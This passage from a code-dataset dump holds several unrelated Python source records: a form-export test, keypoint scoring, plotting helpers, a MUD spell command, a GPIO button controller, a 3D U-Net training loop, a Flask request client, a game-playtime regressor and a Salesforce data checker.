header_instructions = self._get_header_component(headers, 1)\n self.assertEqual(\n [\"\\nAnswer must be a word\", \"\\nEnter a number between 12-15.\",\n \"\\nAnswer must be a date in the following format: day.month.year\",\n \"\\nAssign a unique ID for each Subject.\", '\\nEnter name of the location.',\n \"\\nEnter 1 or more answers from the list.\"], header_instructions)\n\n header_examples = self._get_header_component(headers, 2)\n self.assertEqual(\n [\"\\n\\n\", \"\\n\\n\", \"\\n\\nExample: 25.12.2011\",\n \"\\n\\nLeave this column blank if you want DataWinners to assign an ID for you.\", '\\n\\nExample: Nairobi',\n \"\\n\\nExample: a or ab\"], header_examples)\n\n def test_should_get_header_information_for_submission_excel(self):\n fields = [{\"name\": \"first name\", \"code\": 'q1', \"label\": 'What is your name', \"entity_question_flag\": False,\n \"type\": \"text\"},\n {\"name\": \"age\", \"code\": 'q2', \"label\": 'What is your age', \"type\": \"integer\", \"constraints\": [\n [\n \"range\",\n {\n \"max\": \"15\",\n \"min\": \"12\"\n }\n ]\n ]},\n {\"name\": \"reporting date\", \"code\": 'q3', \"label\": 'What is the reporting date',\n \"date_format\": \"dd.mm.yyyy\", \"type\": \"date\"},\n {\"name\": \"eid\", \"code\": 'eid', \"label\": 'What is the subject id', \"entity_question_flag\": True,\n \"type\": \"text\"},\n {\"name\": \"choices\", \"code\": 'q5', \"label\": 'Your choices', \"type\": \"select\"}]\n form_model = FormModel(self.manager, name=\"some_name\", entity_type=['test'], form_code=\"cli00_mp\", fields=[], type=\"type1\")\n\n headers = get_submission_headers(fields, form_model)\n\n headers_text = self._get_header_component(headers, 0)\n self.assertEqual(\n [\"What is your name\", \"What is your age\", \"What is the reporting date\",\n \"What is the subject id\",\n \"Your choices\"], headers_text)\n\n header_instructions = self._get_header_component(headers, 1)\n self.assertEqual(\n [\"\\n\\nAnswer must be a word\", \"\\n\\nEnter a number between 12-15.\",\n \"\\n\\nAnswer must be a date in the following format: day.month.year\",\n \"\\n\\nEnter the unique ID for each test.\\nYou can find the test List on the My Subjects page.\",\n \"\\n\\nEnter 1 or more answers from the list.\"], header_instructions)\n\n header_examples = self._get_header_component(headers, 2)\n self.assertEqual(\n [\"\\n\\n\", \"\\n\\n\", \"\\n\\nExample: 25.12.2011\",\n \"\\n\\nExample: cli01\",\n \"\\n\\nExample: a or ab\"], header_examples)\n","sub_path":"datawinners/entity/tests/test_export_helper.py","file_name":"test_export_helper.py","file_ext":"py","file_size_in_byte":5032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"337695001","text":"import numpy as np\ndef heatmap2coor_numpy(hp_preds, n_kps = 7, img_size=(225,225)):\n heatmaps = hp_preds[:,:n_kps]\n flatten_hm = heatmaps.reshape((heatmaps.shape[0], n_kps, -1))\n flat_vectx = hp_preds[:,n_kps:2*n_kps].reshape((heatmaps.shape[0], n_kps, -1))\n flat_vecty = hp_preds[:,2*n_kps:].reshape((heatmaps.shape[0], n_kps, -1))\n flat_max = np.argmax(flatten_hm, axis=-1)\n max_mask = flatten_hm == np.expand_dims(np.max(flatten_hm, axis=-1), axis=-1)\n cxs = flat_max%(heatmaps.shape[-2])\n cys = flat_max//(heatmaps.shape[-2])\n ovxs = np.sum(flat_vectx*max_mask, axis=-1)\n ovys = np.sum(flat_vecty*max_mask, axis=-1)\n xs_p = (cxs*15+ovxs)/img_size[1]\n ys_p = (cys*15+ovys)/img_size[0]\n hp_preds = np.stack([xs_p, ys_p], axis=-1)\n return hp_preds\n\n
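# assumed input layout: hp_preds has 3*n_kps channels (n_kps heatmaps plus x/y offset maps);\n# the result is shaped (N, n_kps, 2) with coordinates normalised by img_size\n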
def pcks_score(pred, target, pb_type='regression', n_kps=7, img_size=(225,225), id_shoulder=(3,5), thresh=0.4, stride=None):\n if pb_type == 'detection' and stride is None:\n raise Exception(\"missing \\'stride\\' param on detection problem\")\n sr = id_shoulder[0]\n sl = id_shoulder[1]\n ova_len = len(pred)*n_kps\n if pb_type == 'regression':\n shoulders_len = ((target[...,sr:sr+1]-target[...,sl:sl+1])**2 + (target[...,sr+n_kps:sr+n_kps+1]-target[...,sl+n_kps:sl+n_kps+1])**2)**0.5\n err = np.abs(pred-target)\n err = (err[...,:n_kps]**2 + err[...,n_kps:]**2)**0.5\n err = np.sum(err < shoulders_len*thresh)\n elif pb_type == 'detection':\n pred = heatmap2coor_numpy(pred, n_kps, img_size)\n target = heatmap2coor_numpy(target, n_kps, img_size)\n shoulders_len = ((target[:,sr:sr+1,0]-target[:,sl:sl+1,0])**2 + (target[:,sr:sr+1,1]-target[:,sl:sl+1,1])**2)**0.5\n err = np.abs(pred-target)\n err = (err[...,0]**2 + err[...,1]**2)**0.5\n err = np.sum(err < shoulders_len*thresh)\n else:\n return None\n return err/ova_len","sub_path":"pcks_numpy.py","file_name":"pcks_numpy.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"371167697","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef imshow_tensor(image, ax=None, mean=0, std=1):\n if ax is None:\n fig, ax = plt.subplots()\n\n image = image.numpy().transpose((1, 2, 0))\n mean = np.array(mean)\n std = np.array(std)\n image = std * image + mean\n image = np.clip(image, 0, 1)\n\n ax.imshow(image)\n plt.axis('off')\n\n return ax, image\n\n\ndef visualize_prediction(image, true_label, labels_predicted, probabilities_predicted):\n plt.subplot(1, 2, 1)\n plt.barh(labels_predicted, probabilities_predicted)\n plt.grid()\n plt.subplot(1, 2, 2)\n show_image(image, f' True label: {true_label}')\n\n\ndef show_image(image, title=None):\n image = plt.imshow(np.asarray(image))\n plt.axis('off')\n if title:\n plt.title(title)\n return image\n","sub_path":"plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"359210981","text":"from evennia.commands.default.muxcommand import MuxCommand\n\n\nclass CmdStrike(MuxCommand):\n\n \"\"\"\n +Strike - Call lightning.\n \n Usage: \n +strike <target>\n\n Must be used outside.\n \n \"\"\" \n help_category = \"Forces Magic\"\n auto_help = True\n \n key = \"+strike\"\n locks = \"cmd:all()\"\n\n def func(self):\n if not self.args:\n self.caller.msg(\"You must supply a target for the spell.\")\n return\n hit = self.caller.search(self.args)\n\n if hit == self.caller:\n self.caller.msg(\"You don't want to do that!\")\n return \n if hit:\n hit.msg(\"You are struck by lightning!\")\n self.caller.msg(\"%s is struck by lightning!\" % hit) \n hit.db.conscious = 0\n hit.db.lethal = hit.db.lethal + 4\n healthbar = \"|X|[wHealth:\"\n total = hit.db.lethal + hit.db.bashing\n for i in range(0,8):\n if i < hit.db.lethal:\n healthbar += \" X\"\n elif i < total:\n healthbar += \" /\"\n else:\n healthbar += \" 0\"\n \n hit.msg(prompt=healthbar)\n","sub_path":"arcana/commands/strike.py","file_name":"strike.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"597752056","text":"import gpiozero as gpio\nfrom signal import pause\nimport asyncio\n\nclass InputController():\n def __init__(self, interrupt_pin, input_pin_list):\n 
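# each input pin below gets a power-of-two weight, so any combination of\n # pressed buttons encodes to a unique integer (see read_inputs)\n 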
self.interrupt = gpio.Button(interrupt_pin)\n self.interrupt.when_pressed = self.on_interrupt\n self.bumpers = {}\n\n self.inputs = {}\n for index, pin in enumerate(input_pin_list):\n button = gpio.Button(pin)\n self.inputs[button] = 2**index\n\n def on_interrupt(self): \n self.bumpers[self.read_inputs()]()\n \n def read_inputs(self):\n return sum([value for button, value \n in self.inputs.items() if button.is_pressed])\n\nclass FakeBumper():\n global_cooldown = 1\n def __init__(self, controller, name, input_number, \n cooldown = global_cooldown): \n self.controller = controller\n self.input_number = input_number\n self.cooldown = cooldown\n self.loop = asyncio.get_event_loop()\n self.name = name\n self.controller.bumpers[self.input_number] = self.on_hit\n\n def on_hit(self):\n print('{} was hit!'.format(self.name))\n\n\n# NOTE: the GPIO pin numbers below are illustrative placeholders\ncontroller = InputController(4, [27, 17, 6, 5])\nbumper1 = FakeBumper(controller, '1', 1)\nbumper2 = FakeBumper(controller, '2', 2)\n\npause() # wait for button interrupts\n","sub_path":"encodedbutton.py","file_name":"encodedbutton.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"220532749","text":"import torch\nimport torch.nn as nn\nimport numpy as np\nimport random\nimport os\nfrom torch.utils import data\nfrom sklearn.model_selection import KFold\nfrom data_loaders import Dataset\nfrom data_augment import DataAugment\nfrom models import Modified3DUNet\nimport torch.nn as nn\nimport time\nfrom losses import DiceLoss\n\n##############################################\n# Code for training the Modified3DUnet model obtained from pykao/Modified-3D-UNet-Pytorch on Github.\n##############################################\n\n# Paths where to load data from and save the models to\n#preprocessed_data_path = r'/home/artur-cmic/Desktop/UCL/Brats2019/Data/Preprocessed'\n#save_model_path = r'/home/artur-cmic/Desktop/UCL/Brats2019/KFold_Validation_V3/Model_Saves'\n#save_losses_path = r'/home/artur-cmic/Desktop/UCL/Brats2019/KFold_Validation_V3'\n\npreprocessed_data_path = r'/home/ajurgens/Brats2019/Data/Preprocessed'\nsave_model_path = r'/home/ajurgens/Brats2019/Model_Saves_V4'\nsave_losses_path = r'/home/ajurgens/Brats2019/'\n\nif not os.path.isdir(save_model_path):\n os.mkdir(save_model_path)\n\n# Use GPU\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda:0\" if use_cuda else \"cpu\")\ntorch.backends.cudnn.benchmark = True\n\n# Get paths and names (IDS) of folders that store the multimodal training data\nfolder_paths = []\nfolder_ids = []\nfor subdir in os.listdir(preprocessed_data_path):\n folder_paths.append(os.path.join(preprocessed_data_path, subdir))\n folder_ids.append(subdir)\n\n# Shuffle them around, keeping same seed to make sure same shuffling is used if training is interrupted and needs to be continued\nrandom.seed(4)\nrandom.shuffle(folder_paths)\nrandom.seed(4)\nrandom.shuffle(folder_ids)\n\n# Training Parameters\nbatch_size = 1\nparams = {'batch_size': batch_size,\n 'shuffle': True,\n 'num_workers': 5}\nmax_epochs = 125\n\n# Model Parameters\nin_channels = 4\nn_classes = 4\nbase_n_filter = 16\n\n# Setup KFold Cross Validation\nn_folds = 5 # Number of folds in cross-validation\nkf = KFold(n_splits=n_folds, shuffle=False) # Shuffle=false to get the same shuffling scheme every run\nfold_nr = 1\n\n# Training Loop\nfor fold in kf.split(folder_paths):\n train_idx = fold[0]\n valid_idx = fold[1]\n train_set = Dataset([folder_paths[i] for i in train_idx], [folder_ids[i] for i in train_idx])\n valid_set = Dataset([folder_paths[i] for i in valid_idx], [folder_ids[i] 
for i in valid_idx])\n train_loader = data.DataLoader(train_set, **params)\n valid_loader = data.DataLoader(valid_set, **params)\n\n # Model\n model = Modified3DUNet(in_channels, n_classes, base_n_filter)\n if torch.cuda.device_count() > 1:\n print(\"Let's use\", torch.cuda.device_count(), \"GPUs!\")\n model = nn.DataParallel(model)\n # Loss and optimizer\n #criterion = torch.nn.CrossEntropyLoss().to(device) # For cross entropy\n criterion = DiceLoss() # For dice loss\n optimizer = torch.optim.Adam(model.parameters())\n\n # Load model and optimizer parameters if the training was interrupted and must be continued - need to also change epoch range in for loop\n # checkpoint = torch.load(\"/content/drive/My Drive/Brats2019/Model_Saves_KFold/Fold_1_Epoch_30_Train_Loss_0.0140_Valid_Loss_0.0137.tar\")\n # model.load_state_dict(checkpoint['model_state_dict'])\n model.to(device)\n # optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n #model.train()\n for epoch in range(1, max_epochs + 1):\n start_time = time.time()\n train_losses = []\n for batch, labels in train_loader:\n # Data Augment\n #augmenter = DataAugment(batch,labels)\n #batch,labels = augmenter.augment()\n # Transfer batch and labels to GPU\n batch, labels = batch.to(device), labels.to(device)\n output, seg_layer = model(batch)\n labels = labels.view(-1)\n labels = nn.functional.one_hot(labels, num_classes=4) # For dice loss\n labels = labels.view(-1) # For dice loss\n output = output.view(-1) # For dice loss\n train_loss = criterion.apply(output, labels) # For dice loss\n #train_loss = criterion(output,labels) # For cross entropy\n optimizer.zero_grad()\n train_loss.backward()\n optimizer.step()\n train_losses.append(train_loss.item())\n\n # Get training loss after every epoch\n train_loss_ep = np.mean(train_losses)\n\n # Get validation loss after every epoch\n valid_losses = []\n with torch.no_grad():\n for batch, labels in valid_loader:\n batch, labels = batch.to(device), labels.to(device)\n output, seg_layer = model(batch)\n labels = labels.view(-1)\n labels = nn.functional.one_hot(labels, num_classes=4) # For dice loss\n labels = labels.view(-1) # For dice loss\n output = output.view(-1) # For dice loss\n valid_loss = criterion.apply(output, labels) # For dice loss\n #valid_loss = criterion(output, labels) # For cross entropy\n valid_losses.append(valid_loss.item())\n valid_loss_ep = np.mean(valid_losses)\n elapsed_time = time.time() - start_time\n # Save the training and validation losses to file\n losses_file = open(\"{}/KFold_Losses_V4.txt\".format(save_losses_path), \"a\")\n losses_file.write(\"Fold_{}_Epoch_{}_TrainAvg_{:.4f}_ValidAvg_{:.4f}_TrainLast_{:.4f}_ValidLast_{:.4f}_Time_{}\\n\".format(fold_nr, epoch, train_loss_ep, valid_loss_ep, train_loss.item(), valid_loss.item(), time.strftime(\"%H:%M:%S\", time.gmtime(elapsed_time))))\n losses_file.close()\n\n #print('Fold [{}/{}], Epoch [{}/{}], Train Loss: {:.4f}, Valid Loss {:.4f}, Time_{}'.format(fold_nr, n_folds, epoch, max_epochs, train_loss_ep, valid_loss_ep, time.strftime(\"%H:%M:%S\", time.gmtime(elapsed_time))))\n\n # Save the model parameters\n if (epoch % 25 == 0):\n torch.save({'model_state_dict': model.state_dict(), 'optimizer_state_dict': optimizer.state_dict()}, \"{}/Fold_{}_Epoch_{}.tar\".format(save_model_path, fold_nr, epoch))\n fold_nr = fold_nr + 1","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} 
+{"seq_id":"586595443","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 18 15:10:23 2021\n\n@author: arafa\n\"\"\"\n\nimport requests \nfrom data_in_test import data_in\n\nURL = 'http://127.0.0.1:5000/predict'\n\n# defining a headrers dict for the parameters to be sent to the API\n\nheaders = {'Content-Type' : 'application/json'}\ndata = {'input' : data_in}\n\n# sending get request and saving the response as response object\nr = requests.get(URL, headers = headers, json = data)\n\nr.json()\n","sub_path":"Flask_API/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"170256716","text":"import time\nimport datetime\nimport pickle\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.linear_model import BayesianRidge\n\n\nclass GameRating:\n def __init__(self,\n file=''):\n # original data\n self.file = file\n\n @staticmethod\n def pre_process(data, to_standardize=False, use_pca=None):\n # define keys of 'genres' and 'categories'\n keys = [ # original features\n 'price', 'purchase_year', 'purchase_month', 'purchase_day', 'release_year', 'release_month',\n 'release_day', 'total_positive_reviews', 'total_negative_reviews',\n # 'price', 'purchase_date', 'release_date', 'total_positive_reviews', 'total_negative_reviews',\n # genres\n 'Action_g', 'Adventure_g', 'Animation & Modeling_g', 'Audio Production_g', 'Casual_g',\n 'Design & Illustration_g', 'Early Access_g', 'Free to Play_g', 'Gore_g', 'Indie_g',\n 'Massively Multiplayer_g', 'Nudity_g', 'RPG_g', 'Racing_g', 'Sexual Content_g', 'Simulation_g',\n 'Sports_g', 'Strategy_g', 'Utilities_g', 'Violent_g',\n # categories\n 'Captions available_c', 'Co-op_c', 'Commentary available_c', 'Cross-Platform Multiplayer_c',\n 'Full controller support_c', 'In-App Purchases_c', 'Includes Source SDK_c', 'Includes level editor_c',\n 'Local Co-op_c', 'Local Multi-Player_c', 'MMO_c', 'Multi-player_c', 'Online Co-op_c',\n 'Online Multi-Player_c', 'Partial Controller Support_c', 'Remote Play on Phone_c',\n 'Remote Play on TV_c', 'Remote Play on Tablet_c', 'Shared/Split Screen_c', 'Single-player_c',\n 'Stats_c', 'Steam Achievements_c', 'Steam Cloud_c', 'Steam Leaderboards_c', 'Steam Trading Cards_c',\n 'Steam Workshop_c', 'SteamVR Collectibles_c', 'VR Support_c', 'Valve Anti-Cheat enabled_c',\n # tags\n '1980s_t', \"1990's_t\", '2.5D_t', '2D_t', '3D_t', '3D Platformer_t', '3D Vision_t', '4 Player Local_t',\n '4X_t', 'ATV_t', 'Action_t', 'Action RPG_t', 'Action-Adventure_t', 'Addictive_t', 'Adventure_t',\n 'Aliens_t', 'Alternate History_t', 'America_t', 'Animation & Modeling_t', 'Anime_t', 'Arcade_t',\n 'Arena Shooter_t', 'Artificial Intelligence_t', 'Assassin_t', 'Atmospheric_t', 'Audio Production_t',\n 'Automation_t', 'Base Building_t', 'Based On A Novel_t', 'Batman_t', 'Battle Royale_t',\n \"Beat 'em up_t\", 'Beautiful_t', 'Benchmark_t', 'Bikes_t', 'Blood_t', 'Board Game_t', 'Building_t',\n 'Bullet Hell_t', 'Bullet Time_t', 'CRPG_t', 'Capitalism_t', 'Card Game_t', 'Cartoon_t', 'Cartoony_t',\n 'Casual_t', 'Cats_t', 'Character Action Game_t', 'Character Customization_t', 'Chess_t',\n 'Choices Matter_t', 'Choose Your Own Adventure_t', 'Cinematic_t', 'City Builder_t', 'Classic_t',\n 'Clicker_t', 'Co-op_t', 'Co-op Campaign_t', 'Colorful_t', 
'Comedy_t', 'Comic Book_t',\n 'Competitive_t', 'Conspiracy_t', 'Controller_t', 'Crafting_t', 'Crime_t', 'Crowdfunded_t',\n 'Cult Classic_t', 'Cute_t', 'Cyberpunk_t', 'Dark_t', 'Dark Comedy_t', 'Dark Fantasy_t', 'Dark Humor_t',\n 'Dating Sim_t', 'Demons_t', 'Design & Illustration_t', 'Destruction_t', 'Detective_t', 'Difficult_t',\n 'Dinosaurs_t', 'Diplomacy_t', 'Documentary_t', 'Dragons_t', 'Drama_t', 'Driving_t',\n 'Dungeon Crawler_t', 'Dungeons & Dragons_t', 'Dynamic Narration_t', 'Dystopian_t', 'Early Access_t',\n 'Economy_t', 'Education_t', 'Emotional_t', 'Epic_t', 'Episodic_t', 'Experience_t', 'Experimental_t',\n 'Exploration_t', 'FMV_t', 'FPS_t', 'Family Friendly_t', 'Fantasy_t', 'Fast-Paced_t',\n 'Female Protagonist_t', 'Fighting_t', 'First-Person_t', 'Flight_t', 'Free to Play_t', 'Funny_t',\n 'Futuristic_t', 'Game Development_t', 'Games Workshop_t', 'God Game_t', 'Gore_t',\n 'Gothic_t', 'Grand Strategy_t', 'Great Soundtrack_t', 'Gun Customization_t', 'Hack and Slash_t',\n 'Hacking_t', 'Hand-drawn_t', 'Heist_t', 'Hex Grid_t', 'Hidden Object_t', 'Historical_t', 'Horror_t',\n 'Horses_t', 'Hunting_t', 'Illuminati_t', 'Immersive Sim_t', 'Indie_t',\n 'Intentionally Awkward Controls_t', 'Interactive Fiction_t', 'Inventory Management_t',\n 'Investigation_t', 'Isometric_t', 'JRPG_t', 'Kickstarter_t', 'LGBTQ+_t', 'Lara Croft_t',\n 'Level Editor_t', 'Linear_t', 'Local Co-Op_t', 'Local Multiplayer_t', 'Logic_t', 'Loot_t',\n 'Lovecraftian_t', 'MMORPG_t', 'MOBA_t', 'Magic_t', 'Management_t', 'Mars_t',\n 'Martial Arts_t', 'Massively Multiplayer_t', 'Masterpiece_t', 'Mature_t', 'Mechs_t', 'Medieval_t',\n 'Memes_t', 'Metroidvania_t', 'Military_t', 'Minigames_t', 'Minimalist_t', 'Mod_t', 'Moddable_t',\n 'Motocross_t', 'Motorbike_t', 'Mouse only_t', 'Movie_t', 'Multiplayer_t',\n 'Multiple Endings_t', 'Music_t', 'Music-Based Procedural Generation_t', 'Mystery_t', 'Mythology_t',\n 'Narration_t', 'Nature_t', 'Naval_t', 'Ninja_t', 'Noir_t', 'Nonlinear_t',\n 'Nudity_t', 'Offroad_t', 'Old School_t', 'Online Co-Op_t', 'Open World_t', 'Parkour_t', 'Parody_t',\n 'Party-Based RPG_t', 'Perma Death_t', 'Philisophical_t', 'Physics_t', 'Pirates_t', 'Pixel Graphics_t',\n 'Platformer_t', 'Point & Click_t', 'Political_t', 'Politics_t', 'Post-apocalyptic_t',\n 'Procedural Generation_t', 'Programming_t', 'Psychedelic_t', 'Psychological_t',\n 'Psychological Horror_t', 'Puzzle_t', 'Puzzle-Platformer_t', 'PvE_t', 'PvP_t', 'Quick-Time Events_t',\n 'RPG_t', 'RPGMaker_t', 'RTS_t', 'Racing_t', 'Real Time Tactics_t', 'Real-Time_t',\n 'Real-Time with Pause_t', 'Realistic_t', 'Relaxing_t', 'Remake_t', 'Replay Value_t',\n 'Resource Management_t', 'Retro_t', 'Rhythm_t', 'Robots_t', 'Rogue-like_t', 'Rogue-lite_t',\n 'Romance_t', 'Rome_t', 'Sailing_t', 'Sandbox_t', 'Satire_t', 'Sci-fi_t', 'Science_t', 'Score Attack_t',\n 'Sequel_t', 'Sexual Content_t', \"Shoot 'Em Up_t\", 'Shooter_t', 'Short_t', 'Side Scroller_t',\n 'Silent Protagonist_t', 'Simulation_t', 'Singleplayer_t', 'Sniper_t', 'Snowboarding_t', 'Software_t',\n 'Souls-like_t', 'Soundtrack_t', 'Space_t', 'Space Sim_t', 'Spectacle fighter_t', 'Split Screen_t',\n 'Sports_t', 'Star Wars_t', 'Stealth_t', 'Steampunk_t', 'Story Rich_t', 'Strategy_t', 'Strategy RPG_t',\n 'Stylized_t', 'Submarine_t', 'Superhero_t', 'Supernatural_t', 'Surreal_t', 'Survival_t',\n 'Survival Horror_t', 'Swordplay_t', 'Tactical_t', 'Tactical RPG_t', 'Tanks_t', 'Team-Based_t',\n 'Tennis_t', 'Text-Based_t', 'Third Person_t', 'Third-Person Shooter_t', 'Thriller_t',\n 'Time Manipulation_t', 'Time Travel_t', 
'Top-Down_t', 'Top-Down Shooter_t', 'Touch-Friendly_t',\n 'Tower Defense_t', 'Trading_t', 'Trading Card Game_t', 'Trains_t', 'Transhumanism_t',\n 'Transportation_t', 'Turn-Based_t', 'Turn-Based Combat_t', 'Turn-Based Strategy_t',\n 'Turn-Based Tactics_t', 'Twin Stick Shooter_t', 'Typing_t', 'Underground_t', 'Underwater_t',\n 'Unforgiving_t', 'Utilities_t', 'VR_t', 'Villain Protagonist_t', 'Violent_t', 'Visual Novel_t',\n 'Voxel_t', 'Walking Simulator_t', 'War_t', 'Wargame_t', 'Warhammer 40K_t', 'Western_t',\n 'World War I_t', 'World War II_t', 'Zombies_t', 'eSports_t']\n # perform one-hot encoding\n genres_dummies = data['genres'].str.get_dummies(',').rename(lambda x: x + '_g', axis='columns')\n categories_dummies = data['categories'].str.get_dummies(',').rename(lambda x: x + '_c', axis='columns')\n tags_dummies = data['tags'].str.get_dummies(',').rename(lambda x: x + '_t', axis='columns')\n\n # replace 'genres' by 'genres_dummies', as well as replace 'categories' with 'categories_dummies'\n data = pd.concat([data, genres_dummies, categories_dummies, tags_dummies], axis=1)\n\n # convert a date into a datetime\n def date2time(schema='', date=''):\n # define a mapping from english months to numbers\n month2num = {'Jan': '01', 'Feb': '02', 'Mar': '03', 'Apr': '04', 'May': '05', 'Jun': '06',\n 'Jul': '07', 'Aug': '08', 'Sep': '09', 'Oct': '10', 'Nov': '11', 'Dec': '12'}\n # convert english months into numbers\n for month, number in month2num.items():\n date = date.replace(month, number)\n # return\n return datetime.datetime.strptime(date, schema)\n\n # replace 'purchase_date'\n data['purchase_date'] = data['purchase_date'].apply(lambda d: date2time(schema='%m %d, %Y', date=d))\n # replace 'release_date'\n data['release_date'] = data['release_date'].apply(lambda d: date2time(schema='%d %m, %Y', date=d))\n\n # decompose 'purchase_date'\n data['purchase_year'] = data['purchase_date'].apply(lambda d: d.year)\n data['purchase_month'] = data['purchase_date'].apply(lambda d: d.month)\n data['purchase_day'] = data['purchase_date'].apply(lambda d: d.day)\n # decompose 'release_date'\n data['release_year'] = data['release_date'].apply(lambda d: d.year)\n data['release_month'] = data['release_date'].apply(lambda d: d.month)\n data['release_day'] = data['release_date'].apply(lambda d: d.day)\n\n # fill NANs\n data['total_positive_reviews'] = data['total_positive_reviews'].fillna(value=0)\n data['total_negative_reviews'] = data['total_negative_reviews'].fillna(value=0)\n\n # deal with the missing key(s)\n for k in keys:\n if data.get(k) is None:\n data[k] = 0\n # sort columns by keys\n data = data[keys]\n\n # perform pca\n if use_pca is not None:\n try:\n # attempt to load a PCA model from disk\n with open('save/pca.pickle', 'rb') as f:\n pca = pickle.load(f)\n except FileNotFoundError:\n # generate a new PCA model\n pca = PCA(n_components=use_pca)\n # fit the model with 'data'\n pca.fit(data)\n # save the model\n with open('save/pca.pickle', 'wb') as f:\n pickle.dump(pca, f)\n # reduce the dimensionality of data\n data = pca.transform(data)\n\n # perform standardization\n if to_standardize:\n try:\n # attempt to load a scaler model from disk\n with open('save/scaler.pickle', 'rb') as f:\n scaler = pickle.load(f)\n except FileNotFoundError:\n # generate a new scaler\n scaler = StandardScaler()\n # fit data\n scaler.fit(data)\n # save the scaler\n with open('save/scaler.pickle', 'wb') as f:\n pickle.dump(scaler, f)\n # apply gaussian standardization\n data = scaler.transform(data)\n\n # return\n return 
data\n\n def train(self, to_standardize=False, use_pca=None):\n # read data with total length of 357\n data = pd.read_csv('train.csv')\n\n # pre-process data\n modify = self.pre_process(data, to_standardize, use_pca)\n ground_truth = data.get('playtime_forever')\n\n # slice data\n x_train, y_train = modify, ground_truth\n\n tree = DecisionTreeRegressor()\n tree.fit(x_train, y_train)\n\n with open('save/sklearn.pickle', 'wb') as f:\n pickle.dump(tree, f)\n\n @staticmethod\n def predict(to_standardize=False, use_pca=None):\n data = pd.read_csv('test.csv')\n\n # perform standardization\n modify = GameRating.pre_process(data, to_standardize, use_pca)\n\n # slice data\n x_test = modify\n\n # prediction\n with open('save/sklearn.pickle', 'rb') as f:\n tree = pickle.load(f)\n\n playtime = tree.predict(x_test)\n\n data['playtime_forever'] = playtime\n data = data[['id', 'playtime_forever']]\n data['playtime_forever'] = data['playtime_forever'].apply(lambda x: max(x, 0))\n\n data.set_index('id', inplace=True)\n data.to_csv('save/submission.csv')\n\n\nif __name__ == '__main__':\n model = GameRating()\n # model.train(to_standardize=True, use_pca=None)\n\n # GameRating.predict(to_standardize=True, use_pca=None)\n\n df = pd.read_csv('train.csv')\n\n non_zero = df.loc[(df['playtime_forever'] != 0)]\n","sub_path":"attachment/rf_model.py","file_name":"rf_model.py","file_ext":"py","file_size_in_byte":13158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"634656878","text":"###################################################################################################################################\r\n# This script uses a Python package called \"simple salesforce\" to connect to Salesforce and use the Salesforce query language,\r\n# i.e. very similar to SQL, and then traverses the response data structure to print the Mark In status for an access code in Salesforce.\r\n# created by Ben, Christina and Sunjeet, 14th June 2017\r\n####################################################################################################################################\r\n
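# Illustrative shape of the query built in checkMarkInFromDB below (object/field names are hypothetical):\r\n#   SELECT Mark_In__c FROM Response__c WHERE Document_Id__c LIKE 'ACCESSCODE%'\r\n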
\r\n\r\n#Simple salesforce package that is being used for this Test script \r\nfrom simple_salesforce import Salesforce\r\nimport ErrorLogging\r\n\r\n\r\n# connect to salesforce sandbox (regression) environment, using the desired user name and password AND security token that can be retrieved from that SF instance --> \r\n# (under your user name) \"my settings\" hyperlink --> \"personal\" --> \"reset my security token\"\r\n\r\n\r\ndef connectToSalesForceDB(user, pw, token):\r\n sf = Salesforce(username = user, password = pw, security_token = token, sandbox = True)\r\n \r\n return sf\r\n\r\n# run a SOQL query to select the Mark In value from a response salesforce object, for a particular access code\r\n# the documentation for exposed APIs can be found in Salesforce from set up --> Build --> create --> Objects \r\ndef checkMarkInFromDB(salesForceConnection, partialQuery, docIdGuidList):\r\n notFoundDataList = []\r\n dataWithErrorList = []\r\n isMarkedIn = False\r\n print(docIdGuidList)\r\n for docIdGuidTuple in docIdGuidList:\r\n query = partialQuery + \"'\" + docIdGuidTuple[0] + \"%\" + \"'\" \r\n print(\"salesforce query: \" + query)\r\n result = salesForceConnection.query_all(query)\r\n print(\"result: \")\r\n print(result)\r\n if (result is None):\r\n notFoundDataList.append(docIdGuidTuple)\r\n else: \r\n record = (result['records'])\r\n if (record != []):\r\n an_dict = record[0] \r\n isMarkedIn = an_dict['Mark_In__c']\r\n if (isMarkedIn != True):\r\n errorDataToBeLogged = (docIdGuidTuple[0], docIdGuidTuple[1], \"Not MarkedIn\")\r\n dataWithErrorList.append(errorDataToBeLogged)\r\n return notFoundDataList, dataWithErrorList\r\n\r\n#This is the main function in this module and calls the other functions.\r\ndef checkDataInSalesForce(user, pw, token, query, docIdGuidList, errorLogLocation, headerList):\r\n sf = connectToSalesForceDB(user, pw, token)\r\n \r\n notFoundDataList, dataWithErrorList = checkMarkInFromDB(sf, query, docIdGuidList)\r\n if (notFoundDataList != [] or dataWithErrorList != []):\r\n ErrorLogging.generateErrorLog(notFoundDataList, dataWithErrorList, \"SalesForce\", errorLogLocation, headerList)\r\n\r\n\r\n\r\n\r\n","sub_path":"CheckSalesForce.py","file_name":"CheckSalesForce.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"460745185","text":"import os\nfrom 